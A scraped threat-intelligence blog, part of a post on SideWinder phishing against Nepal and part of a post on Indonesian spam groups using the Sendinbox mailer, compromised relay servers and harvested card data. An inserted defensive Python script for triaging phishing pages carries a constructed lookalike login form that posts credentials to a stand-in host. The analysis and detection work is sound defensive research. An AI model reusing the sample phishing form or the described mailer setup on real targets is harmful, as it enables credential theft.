the content from the real government website and redirecting to it once credentials are entered:</div><div><span><span><span><span><span style="font-family: Arial;"><span><span><span><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oENZ2pMcUx7-0KwRd_wEO5u_dj_heWa2eTgFMBWbTlTHUg2taI8gyIOb-SV0PgrUPjcdpn01TgrXuHW7COU2EPSnsuNrpqLPZXK514sq3VUkF4cJNWoac4thnnRenaheVsaK125c96HP/s1517/17.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="1517" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oENZ2pMcUx7-0KwRd_wEO5u_dj_heWa2eTgFMBWbTlTHUg2taI8gyIOb-SV0PgrUPjcdpn01TgrXuHW7COU2EPSnsuNrpqLPZXK514sq3VUkF4cJNWoac4thnnRenaheVsaK125c96HP/w640-h202/17.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div></span></span></span></span></span></span></span></span><div class="separator" style="clear: both;">This finding is particularly interesting given that Nepal had elections fast approaching in April and May of this year, which were overturned only as of <a href="https://www.wionews.com/south-asia/nepal-supreme-court-overturns-prime-minister-kp-sharma-olis-house-dissolution-365693">last week</a>. <br /><br />Given that these elections were only announced at the end of December 2020, we think this explains some of the motivation behind the group’s renewed activity and new target focus over the past couple of months. 
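<br /><br />As an added example (not code from the original post, from SideWinder, or from any tool named above), the following Python script turns the phishing-kit observations in this section into checks a defender can run over a page saved from a proxy capture: it reports when a page loads its media and scripts from one host while its form submits credentials to another, parses a meta refresh redirect such as the ~15 second delay CapTipper showed between decoy article and login panel, and lists error text that is already rendered before anything has been submitted. The hostnames real-ministry.example and lookalike-ministry.example and both sample pages are constructed for this example.<br /><br />

```python
"""Heuristic triage of a captured credential-phishing page.

Added example, not code from the original post or from the threat actor.
It checks a saved HTML page for the traits the post describes: media loaded
from the impersonated site while credentials go elsewhere, a timed meta
refresh from a decoy article to a login panel, and error messages hardcoded
into the page as a pretext. All hostnames and sample pages are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# tag -> attribute naming a remotely loaded resource
ASSET_ATTRS = {"img": "src", "script": "src", "link": "href", "iframe": "src"}
# void elements never get a closing tag and must not touch the element stack
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "param", "source", "track", "wbr"}
ERROR_LIKE = re.compile(r"error|alert|invalid|warning", re.I)
REFRESH_RE = re.compile(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"]+)", re.I)


class _PageScanner(HTMLParser):
    """Collects asset hosts, form targets, meta refresh and pre-filled error text."""

    def __init__(self):
        super().__init__()
        self.asset_hosts = set()   # hosts that media/scripts/styles are fetched from
        self.form_hosts = set()    # hosts that forms submit to ("" = the page host)
        self.refresh = None        # (delay_seconds, target_url) from a meta refresh
        self.error_texts = []      # text already rendered inside error/alert-like boxes
        self._stack = []           # one bool per open element: is it error-like?

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ASSET_ATTRS and a.get(ASSET_ATTRS[tag]):
            host = urlparse(a[ASSET_ATTRS[tag]]).hostname
            if host:
                self.asset_hosts.add(host.lower())
        elif tag == "form":
            self.form_hosts.add((urlparse(a.get("action", "")).hostname or "").lower())
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content", ""))
            if m:
                self.refresh = (int(m.group(1)), m.group(2).strip())
        if tag not in VOID:
            marker = a.get("class", "") + " " + a.get("id", "")
            self._stack.append(bool(ERROR_LIKE.search(marker)))

    def handle_endtag(self, tag):
        if tag not in VOID and self._stack:
            self._stack.pop()

    def handle_data(self, data):
        text = " ".join(data.split())
        if text and any(self._stack):   # visible text inside an error-like box
            self.error_texts.append(text)


def analyze_page(page_html, page_host):
    """Return the indicators found in page_html, which was served from page_host."""
    scanner = _PageScanner()
    scanner.feed(page_html)
    scanner.close()
    page_host = page_host.lower()
    external = {h for h in scanner.asset_hosts if h != page_host}
    sinks = {h or page_host for h in scanner.form_hosts}   # relative action = page host
    content_vs_sink = bool(external and sinks and not (sinks & external))
    findings = []
    if content_vs_sink:
        findings.append(f"content comes from {sorted(external)} but credentials go to {sorted(sinks)}")
    if scanner.refresh:
        findings.append(f"meta refresh to {scanner.refresh[1]} after {scanner.refresh[0]}s")
    if scanner.error_texts and sinks:
        findings.append(f"error shown before any submission: {scanner.error_texts[0]!r}")
    return {
        "asset_hosts": sorted(scanner.asset_hosts),
        "credential_sinks": sorted(sinks),
        "refresh": scanner.refresh,
        "hardcoded_errors": scanner.error_texts,
        "findings": findings,
        "suspicious": content_vs_sink or bool(scanner.error_texts and sinks),
    }


# Constructed sample: lookalike login page whose stylesheet, script and logo come
# from the impersonated site, whose form posts to the lookalike host, and which
# shows an error box before anything has been submitted.
SAMPLE_LOGIN_PAGE = """<html><head>
<link rel="stylesheet" href="https://mail.real-ministry.example/css/login.css">
<script src="https://mail.real-ministry.example/js/app.js"></script>
</head><body>
<img src="https://mail.real-ministry.example/images/logo.png">
<div class="alert alert-danger">Session expired. Please sign in again to continue.</div>
<form method="post" action="https://lookalike-ministry.example/post.php">
  <input name="user"><input name="pass" type="password"><br>
  <button>Login</button>
</form></body></html>"""

# Constructed sample: decoy article that forwards to the login page after 15 s.
SAMPLE_LURE_PAGE = """<html><head>
<meta http-equiv="refresh" content="15;url=https://lookalike-ministry.example/login.html">
</head><body><p>Press release text shown while the timer runs.</p></body></html>"""

if __name__ == "__main__":
    for name, page in (("lure", SAMPLE_LURE_PAGE), ("login", SAMPLE_LOGIN_PAGE)):
        result = analyze_page(page, "lookalike-ministry.example")
        print(name, "suspicious" if result["suspicious"] else "no verdict")
        for line in result["findings"]:
            print("  -", line)
```

<br /><br />Run it as-is to see the findings for the two constructed pages, or pass analyze_page() a page saved from a capture together with the host it was served from. Legitimate sites that serve their assets from a separate CDN host also trip the content-versus-sink check, so treat the output as triage that prioritises review rather than a verdict, and note that the redirect check only covers meta refresh, not JavaScript-driven redirects.<br />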
<span><span><span><span><span><span><span><span><span><div style="font-family: Arial;"><br /></div></span></span></span></span></span></span></span></span></span><div><span><span><span><span><span><span><span><span><span><span><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center; vertical-align: baseline; white-space: pre-wrap;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;"><span style="color: #ffa400; font-family: inherit; font-size: medium;">Conclusion</span></span></p></span></span></span></span></span></span></span></span></span></span><br />There were a few other findings we gathered from this server which we decided not to cover in this post, as we didn't consider them much different from the phase of operations this group was in at the end of last year. Some, for instance, were connected to the mobile malware applications being developed by SideWinder; this part of their operations still seems to be very much in the development and testing stage, as is evident from what looks like internal testing left behind by the developers.</div>
<div><span><span><span><span><span><span><span><span><span><span><br /><p dir="ltr" style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; vertical-align: baseline; white-space: pre-wrap;"></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgILxLsjIVDo95gPwcMSscChy6djACDW1F7vKWnWnffdF4wLv1LJklEbwDY3IaBHuXd-dGJ7cH_ZTDDHuMBauniQ_uuqCBu6kafGF6j9Y1iVakmMuAQeHN2zgX7gia0Ma9HLImGPj-bPocE/s1110/18.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="399" data-original-width="1110" height="230" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgILxLsjIVDo95gPwcMSscChy6djACDW1F7vKWnWnffdF4wLv1LJklEbwDY3IaBHuXd-dGJ7cH_ZTDDHuMBauniQ_uuqCBu6kafGF6j9Y1iVakmMuAQeHN2zgX7gia0Ma9HLImGPj-bPocE/w640-h230/18.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Log left behind by the group.</td></tr></tbody></table></span></span></span></span></span></span></span></span></span></span><br />We also can’t confirm that all of the phishing infrastructure we uncovered will indeed deliver malware or be preceded by a malicious payload once in use. Even though the phishing pages reside on the same server as other malware, this remains unclear at this stage, and some of these pages may well be used in single-purpose credential phishing campaigns.<br /><br />On the other hand, what we did cover in this post shows that SideWinder remains very much focused on conducting espionage operations against its area of interest in South Asia. 
Taking into account what this group has done in the past year, we should treat this renewed activity as an indication that SideWinder will only continue to ramp up its operations through the remaining months of 2021 and beyond.<br /><br />The group’s continued interest in Nepal serves as evidence of that. We can only speculate that regional developments such as potential elections in countries of the region, geopolitical tensions such as the military clashes on the India-China border, international events mixed with regional efforts such as COVID-19 vaccine distribution, and other regional interests will continue to fuel such campaigns by the group in South Asia. We should anticipate more such spear phishing activity, along with further development of their malware and specifically their mobile malware capabilities, to launch campaigns against the group’s targets of interest. <div class="separator" style="clear: both; font-variant-east-asian: normal; font-variant-numeric: normal; text-align: left; vertical-align: baseline;"><span><span><span><span><span><span><span><span><span><span><span id="docs-internal-guid-95cc3a8d-7fff-903a-bdac-959e7d316716"><div style="font-family: Arial; white-space: pre-wrap;"><span style="font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></div></span></span></span></span></span></span></span></span></span></span></span><div><span><span><span><span><span><span><span><span><span><span><span><span><p dir="ltr" style="font-variant-east-asian: normal; font-variant-numeric: normal; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left; vertical-align: baseline; white-space: pre-wrap;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;"><span style="font-family: inherit; font-size: medium;">Indicators of 
Compromise</span></span></p></span></span></span></span></span></span></span></span></span></span></span></span><br /></div></div></div></div></div></div></div></div></div></div></div>Andrei Kornevhttp://www.blogger.com/profile/11381063307200503085noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-32130043417673943422018-09-05T16:00:00.001-04:002018-09-05T23:16:46.883-04:00Indonesian Spam Communities<a href="http://www.deependresearch.org/2018/07/uncovering-paypal-phishing-campaign.html" style="font-family: arial, helvetica, sans-serif;">In our last post</a><span style="font-family: "arial" , "helvetica" , sans-serif;"> we tried to shed some light at what seemed to appear as a very
common PayPal phishing email at first glance but, the deeper we looked, turned out to be connected to a considerably larger and more unusual campaign. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">When we investigated that <a href="https://lh4.googleusercontent.com/yNJCPdXhOsAAw_W-hCXiffsDTra4_65Ctzy8ce_IlPnTsWWVbvVeU37fGkihKojjY82PiJvNChcFVN4bgxM8UlFiiIHS15HNzFqJ_M7Eqc9pOD09ZVJPv-JpyuMjj6i9lALM_gXV">single email</a>, we were able to discover a wide-ranging spam group originating from Indonesia which appeared to be responsible for the phishing activity we originally saw. Through that seemingly ordinary PayPal phishing email, we found that an Indonesian group was targeting the customer bases of various well-known companies by mass-mailing phishing emails via uniquely identifiable Twitter-shortened URL redirections. </span><br />
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">They have done so with great success, as we <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsrtlmSCcH2Ed8vr8ZSh5SRpNXgtR5207AHhlBb7EQM1T_MCamN3AfrUznzvOzO4deDcQVFOtP1KCCP1nQYpbagO_iC7SHFB3fCW5vHRp2CsjnLsvrJjNN9V7aiRWYRaXHfAqWSOTVvN2M/s1600/e57ef509-f094-4c20-b7ff-e40b82a3fbe5.jpg">demonstrated by showing</a> some of the attacker’s self-shared screenshots of incoming victim credit card information. We last left off by identifying some additional Twitter handles spreading phishing links and hunting for more infrastructure connected to that specific campaign.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since our last update on the matter, we’ve continued to monitor this group’s activity, passing along our findings to relevant parties. In the process of studying this group, however, we’ve also discovered a second Indonesian spamming community, in addition to the SlackerC0de and Spammer ID groups identified in our previous post. This second group uses a slightly different set of tools and techniques, but stays true to the same core of collective financial scamming efforts which we've previously written about.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>SendInbox</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">While we were looking at what the Spammer ID guys were doing in their group, we saw that they began discussing an additional mailing tool they were using called "<a href="https://github.com/leakedtools/sendinbox">Sendinbox</a>". Up to this point we had mainly seen them share their use of mailing tools like "<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS2kMPWN3X22AL4jdyBGWRrfQ6i18bG3y2XaTJeFbKUHHyV9vnUV1uBE7ONwfSuD2r5I0clnsilUzdmu8bpbvtMeNnv8zS9ihyphenhyphengwBCwnofRuHRUeTlogi7lWu-WVVFYAh7p75jdPKQa_hT/s1600/apple.jpg">heart sender</a>" and "<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLOylOxPtb6CJPh-jrpPF9sUwKZfe5by6oKIPfhkxPU8pDL2GtiO52PgebtMt1m4bYckichnX-YBmcTsCixW8ZvA7Dc0VC33A9Xm21tdDvLH6BZaKrl-S9aKtPFzfHpsY0Oi9mkafd8fhb/s1600/photo6082343719375316997.jpg">GX40 sender</a>". </span><span style="font-family: "arial" , "helvetica" , sans-serif;">We've also seen the Spammer ID group try to use <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxo3mCMbP6td4a6SlsdnGobd_y96Nb4GE2wciZ9Xg9P5fRluaqK2Th209ad87KAPp0qqVMX7CQuFJihvQgQL5VQo1faCdSFcSCvh48hfhLCT5t47GT8lwrl8BOJgXI3ozCTCRf0YKkzkL9/s1600/xampp.png">XAMPP</a> with sendmail on their localhost, relaying through SlackerC0de infrastructure. They used these methods along with web-based tools on their group websites, like the ones we saw them make available on tool[.]slackerc0de[.]us</span>. <span style="font-family: "arial" , "helvetica" , sans-serif;">When we took a look at what "Sendinbox" was, we saw that it was a PHP tool based on the popular PHPMailer library. After we started going through the group's chat we witnessed them discuss how they were setting this tool up on their shared group servers, mainly using Apple and PayPal phishing letters as their payload.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwMnnxV6gx9pPiXv8n0v9gPqHAMQnA1Dag6zCqFgJlXKBw_yF3uXN6kB-Fh40vzYIzyV2RBjg7f-nMyAC6gyKGyIj1mmXr0pUys4Vn9uEEGdl-xkoWWjsOADnEyuYGwcghGHS3OfUjptxR/s1600/photo6069042008091109760.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwMnnxV6gx9pPiXv8n0v9gPqHAMQnA1Dag6zCqFgJlXKBw_yF3uXN6kB-Fh40vzYIzyV2RBjg7f-nMyAC6gyKGyIj1mmXr0pUys4Vn9uEEGdl-xkoWWjsOADnEyuYGwcghGHS3OfUjptxR/s640/photo6069042008091109760.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj55cARk3uDUX-zRhVTWk5Xdr3Aq98fTvSoophbx2hWJHpBEs2u2droIx77P6yoVyANIMsn-_Gy6LTN121iyP6Ul6RuS5Lp923-drNVVpocQC2aabet8OQbF4G0WmkRBKwXk0frs0_IYear/s1600/photo6073545607718480002.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="800" data-original-width="1280" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj55cARk3uDUX-zRhVTWk5Xdr3Aq98fTvSoophbx2hWJHpBEs2u2droIx77P6yoVyANIMsn-_Gy6LTN121iyP6Ul6RuS5Lp923-drNVVpocQC2aabet8OQbF4G0WmkRBKwXk0frs0_IYear/s640/photo6073545607718480002.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">As you can see from the above screenshots, the 'Sendinbox' tool lets the attacker send many emails at once with a preconfigured scam message through mail relay servers. In this example the attacker is sending to his own Yahoo account to test whether his emails arrive as regular inbox mail or are filtered as spam. We kept seeing this kind of "QA" process at each stage as the attackers changed servers. </span><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><u>BMarket ID</u></b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">"Sendinbox" is made by an "Eka Syahwan", who runs a community of groups separate from Spammer ID on various social platforms. The main purpose of this community is to provide support to the user base to whom he sold his mailer tool. A happy customer in this case brings in more potential buyers. The main website for this community, Bmarket[.]or[.]id, also hosts a relay server for email campaigns at hxxp://bmarket[.]or[.]id/sendinbox-server[.]php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">A close-knit user base such as this offers the would-be scammer support for his phishing campaigns, while the tool creator provides updates to the tool and workarounds for service blocks, which <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3dqRD8OY2xiisgTjenjUs4rkkx2LZCGQJ9NQvV6DbLynJLMgGpn60UiNiIx16Ng11mpq0fe8qo4MzoZkqI8LaKlkUtka81g_Axyk1JUfn2lpycLcaPWooUwjZ9ABReA1fy9DGDBbOSHsa/s1600/photo4934108152937424846.jpg">kept mounting</a> the more we read of their group correspondence. Group members complained that the provided email servers were not delivering their scams successfully, or that the messages were landing in spam folders, so we witnessed a heavy shift from the recognized servers like </span><span style="font-family: "arial" , "helvetica" , sans-serif;">bmarket[.]or[.]id</span><span style="font-family: "arial" , "helvetica" , sans-serif;"> to group members actively looking for compromised servers to relay their emails. </span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzeqBSMoo6Qs_InSWbboiwSQSnwYExprIwgMAzWDdbmCa-QUKZEWUVWQbGE04J6Mc4DHbl46oo0cA_TJxbpA6IOaRPD8tls4klPnyj671t_AG-uC7p9iYFdwt7itT8n5-y2ZcSmxkHP2S/s1600/telegram.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="535" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBzeqBSMoo6Qs_InSWbboiwSQSnwYExprIwgMAzWDdbmCa-QUKZEWUVWQbGE04J6Mc4DHbl46oo0cA_TJxbpA6IOaRPD8tls4klPnyj671t_AG-uC7p9iYFdwt7itT8n5-y2ZcSmxkHP2S/s1600/telegram.png" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Group members such as the one above started looking for compromised servers on which to upload their Sendinbox tool for future campaign use, and shared them with the group. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">Once they had gained a foothold on a compromised website, they uploaded their SendInbox email tool, as can be seen below.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmkB8Dpbgzt2_RbKvAzLO_ZDlqc5K33W8lkVojtkSTvmrlQX2sfKIZpZ9EDdVPA76USKwsJtY5EIOn9y-8lySK5vMSlg85iVmPJ7M7DuGhZjU4CuoTFOHuxOwL10qv7InBKiDDCLcCsT1L/s1600/photo6075638833044629652.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="1280" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmkB8Dpbgzt2_RbKvAzLO_ZDlqc5K33W8lkVojtkSTvmrlQX2sfKIZpZ9EDdVPA76USKwsJtY5EIOn9y-8lySK5vMSlg85iVmPJ7M7DuGhZjU4CuoTFOHuxOwL10qv7InBKiDDCLcCsT1L/s640/photo6075638833044629652.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Other members also shared their use of vulnerability scanning tools to hunt for potential servers in the group chat.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1hahl-mGSN99TW9ohsNTQ7_qXt8dsLy_aGVOX8Pft8rOK-ISPc0djk1N_mNYqnoHBwA4DXqwKWjcyYDxDvmr-Aj0c4NiWWAdM1qmRwkXAmj4zj4f_GPIAN3iDMQHN0EJdbkgmmV5GkJz0/s1600/photo6073545607718480033.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1hahl-mGSN99TW9ohsNTQ7_qXt8dsLy_aGVOX8Pft8rOK-ISPc0djk1N_mNYqnoHBwA4DXqwKWjcyYDxDvmr-Aj0c4NiWWAdM1qmRwkXAmj4zj4f_GPIAN3iDMQHN0EJdbkgmmV5GkJz0/s640/photo6073545607718480033.jpg" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Along with the proactive hunting these group members were conducting, they were monitoring another website belonging to the "Sendinbox" tool creator called IndoXploit which listed additional compromised servers for them to use in their phishing campaigns.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHcdQ0SYaeXygt7C_773JvyNLdmQ4QW2IL4mw2wlxW_8tJO1nhjnn5SR3QOjHLjLFa6FMGWkn-eFvvbGkjNpG4GzfqG7fJQSlWmDJmEj_mfu4WPIDaDxuwsdnBoFzV38TTzKjl0Ls4U3Yw/s1600/photo6073545607718479999.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="719" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHcdQ0SYaeXygt7C_773JvyNLdmQ4QW2IL4mw2wlxW_8tJO1nhjnn5SR3QOjHLjLFa6FMGWkn-eFvvbGkjNpG4GzfqG7fJQSlWmDJmEj_mfu4WPIDaDxuwsdnBoFzV38TTzKjl0Ls4U3Yw/s1600/photo6073545607718479999.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Eka Syahwan even lists this fact on his personal Facebook profile, along with regular updates to his scamming activity, as we can see in his most recent warning post about some rippers that recently tried to do business with him on Telegram:</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisVolEDY4CRXVGx0409ygEfuZxA1H5HePjAbFnSoVkGu4Vu6dH2HgqCeXHBWxjd0PpUqrXX9s6iRd2mFD0BhjeIoX_HSKyBeIfk_n5MA4D8lPb03xqMyZJYvzcBUPHVZ8lZo408JDT-E0J/s1600/EkaSyahwan.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="316" data-original-width="712" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisVolEDY4CRXVGx0409ygEfuZxA1H5HePjAbFnSoVkGu4Vu6dH2HgqCeXHBWxjd0PpUqrXX9s6iRd2mFD0BhjeIoX_HSKyBeIfk_n5MA4D8lPb03xqMyZJYvzcBUPHVZ8lZo408JDT-E0J/s640/EkaSyahwan.png" width="640" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Since this is a smaller community that tends to share its successes and failures a little more openly than Spammer ID, it was easier for us to track what they were doing in their campaigns. </span><span style="font-family: "arial" , "helvetica" , sans-serif;">And this group was definitely busy: we've seen them successfully harvest many CC records via targeted email lists, ranging from alphabetically ordered emails to addresses from specific sectors like large educational institutions in the US. </span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_7_kgwdhutQyFVXbGu7TZe5-gYxfyBaAQZXVf5ke8F1jGrTixSdBYbB2Vo8fLkA_sA1qe-iFUZ-F6_9Fu2myTKr3p9kwApFZ3b69CdQeV6fL7ODdHX1baUIS3FSHQA9xXyPkfXeUKUtU/s1600/ablist.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="719" data-original-width="1280" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP_7_kgwdhutQyFVXbGu7TZe5-gYxfyBaAQZXVf5ke8F1jGrTixSdBYbB2Vo8fLkA_sA1qe-iFUZ-F6_9Fu2myTKr3p9kwApFZ3b69CdQeV6fL7ODdHX1baUIS3FSHQA9xXyPkfXeUKUtU/s640/ablist.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px;">An email list an attacker has prepared for mass-spamming his phishing letters. The list consists of alphabetically ordered Yahoo accounts which had already been validated as Apple users. </td></tr>
</tbody></table>
<span style="font-family: "arial" , "helvetica" , sans-serif;">We've witnessed this group target specific sectors or user bases, as in the example below, where they specifically target Japanese users of the IT provider Softbank Japan:</span><br />
<div style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTrnXd9fxKjJR9CxQqhRkgxz44gVJr4Q08ozME02b3VezF6VZc9N4eOj9WFwsx7XMCohhob_NsPg1yaJqmwOJeWCfI64v2KNpl9C_XmnZDte8nX57BaXANbxo7K2lxkbTBq33h0bbQ2R2l/s1600/softbank.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1280" data-original-width="960" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTrnXd9fxKjJR9CxQqhRkgxz44gVJr4Q08ozME02b3VezF6VZc9N4eOj9WFwsx7XMCohhob_NsPg1yaJqmwOJeWCfI64v2KNpl9C_XmnZDte8nX57BaXANbxo7K2lxkbTBq33h0bbQ2R2l/s640/softbank.jpg" width="480" /></a></div>
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">This group is also sophisticated enough to socially engineer letters appropriate for a geographic and linguistic group like these Japanese Apple users: we caught them testing various Japanese templates, checking how they are received in a Japanese Yahoo mailbox, and bouncing them off Japanese accounts where possible.</span><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8jlE54l8P5QCtSKkjO0q7_m9Cq0-opUTmhXDYrCE-zrxpW2Kp8IuN5YNJ4A-dVuk4ylIRed9aGgghrvNM3zXGrLTluDCHBQaN8kEZ7i53e4GCFKHr5R0YU0LyT_t4UQCB6857q-r6y2w6/s1600/japanemail.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8jlE54l8P5QCtSKkjO0q7_m9Cq0-opUTmhXDYrCE-zrxpW2Kp8IuN5YNJ4A-dVuk4ylIRed9aGgghrvNM3zXGrLTluDCHBQaN8kEZ7i53e4GCFKHr5R0YU0LyT_t4UQCB6857q-r6y2w6/s640/japanemail.jpg" /></a></div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg37o3ydgh7_fE4iE8j5S7Zo9BSeWMqGd5XEL7CZqErofIqdfsap_Cb2jMex7AYzs3pzUjhyphenhyphenTwRB1Lg7-zxO-xuPJTRV3f9_1DzvHhlYU1lqRAV7_GeHTeMoyolOo6BDost3zhzeJqZZP2i/s1600/yahoojp.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg37o3ydgh7_fE4iE8j5S7Zo9BSeWMqGd5XEL7CZqErofIqdfsap_Cb2jMex7AYzs3pzUjhyphenhyphenTwRB1Lg7-zxO-xuPJTRV3f9_1DzvHhlYU1lqRAV7_GeHTeMoyolOo6BDost3zhzeJqZZP2i/s640/yahoojp.jpg" /></a></div>
<br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPzQKvtq6Ebl24CFxlPoyrU2BIeylE3Ci1OINjwQ587knqyob_Hs2jH5sCTaG_m570J6jGrmqlZsHATDPpkCpQZK7Tvfcpfqk1LVqkbizbEz36nplA1D80DzhO2Ek87DTM-pNAoI7w5Qp/s1600/photo6082524584743118946.jpg"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhPzQKvtq6Ebl24CFxlPoyrU2BIeylE3Ci1OINjwQ587knqyob_Hs2jH5sCTaG_m570J6jGrmqlZsHATDPpkCpQZK7Tvfcpfqk1LVqkbizbEz36nplA1D80DzhO2Ek87DTM-pNAoI7w5Qp/s640/photo6082524584743118946.jpg" /></a></div>
<div style="text-align: center;">
Successfully harvested credentials received in an attacker's email.</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">
